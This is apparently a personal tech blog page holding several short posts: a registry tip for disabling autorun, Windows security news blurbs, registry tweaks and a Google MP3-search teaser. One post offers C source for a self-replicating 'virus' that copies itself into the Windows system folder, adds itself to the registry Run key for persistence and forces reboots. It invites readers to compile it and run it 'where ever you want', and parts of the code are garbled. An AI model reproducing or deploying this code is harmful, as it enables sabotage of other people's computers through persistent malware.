Ahsun Taquveem Chohan

How to disable autorun(.inf) to prevent autorun Trojan
To disable Autorun system wide (for all users) on all the drives:
save the following script as .reg -file and double-click it (melt it with registry)

======================================================Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff

=======================================================

Read more…

Share on Facebook

Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

Source Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;

case 2:

target=fopen("D:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");

break;

case 3:

target=fopen("E:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");

break;

case 4:

target=fopen("F:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart

}

How to recover/remove the virus:

1) Open up PC in safe mode

2) C:\windows:\system … you will find it(sysres) so delete it !

3) open registry :

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

4) You will find it also delete it …

If anything else goes wrong, feel free to contact me

Share on Facebook

Windows 7 (formerly known as Vienna and Blackcomb) is a complete new version in windows series introduced by Microsoft for use on personal computers, including business PC’s. There is a close relation between security and usability, which the software developers often sacrifice for the other.

Microsoft is NO Exception.

Read more…

Share on Facebook

Anyone who knows anything about security knows that this kind of disaster was only a matter of time. Windows botnets are responsible for DDoS attacks and most of e-mail spam. You cannot secure Windows .

Continued here:
It’s time to get rid of Windows – Computerworld Blogs

Share on Facebook

Speed and power have long been the most important criteria when judging a supercomputer’s worth as a number-crunching lab workhorse, but energy efficiency is fast catching up. The greenest supercomputers are those that can process the most scientific calculations per second while drawing the least power. [More]

View original here:
Power-hungry supercomputers going green

Share on Facebook

Leo Davidson released a proof-of-concept showcasing Windows 7 User Account Control feature flaw elevating a command prompt window using the whitelisted explorer.exe process.

Go here to read the rest:
Microsoft Security Essentials lists Windows 7 UAC hack as malware

Share on Facebook

REGISTRY EDITINGS
To open Windows Registry:
1. Click Start and Run
2. type "regedit" (without quotes)

Configure Remote Access Client Account Lockout (Windows 2000/XP)
Configure Remote Access Client Account Lockout (Windows 2000/XP) You can use the remote access account lockout feature to specify how many times a remote access authentication has to fail against a valid user account before the user is denied access. Use this tweak to set the number of failed logins before the account is locked-out and the time before the lockout is reset.

 

 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout

Disable the Ability to Right Click on the Desktop (All Windows)

This tweak removes the context menu that would normally appear when the user right clicks on the desktop or in the Explorer right results pane.

Open your registry and find or create the key below. Create a new DWORD value, or modify the existing value, called "NoViewContextMenu" and set it according to the value data below.

Exit your registry, you may need to restart or log out of Windows for the change to take effect.

 

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]Value Name: NoViewContextMenuData Type: REG_DWORD (DWORD Value)Value Data: (0 = disabled, 1 = enabled

Read more…

Share on Facebook

Hello everyone,
I’ve seen many people having problem in searching.
Here are few tips/tricks how to search using Google

Searching Google for Music – Advanced Guide

This How-To will teach you how to use google to find mp3s. This How-To
will be highly pragmatic and will focus on the hows and not the
wherefores of the various search strings.

Index
———————————————————————-
0) Key
1) Directories
2) Xitami Servers
3) Directory Listing
4) Andromeda Servers
5) Zina Artists
6) Apache mp3 Servers
7) Individual Songs

Read more…

Share on Facebook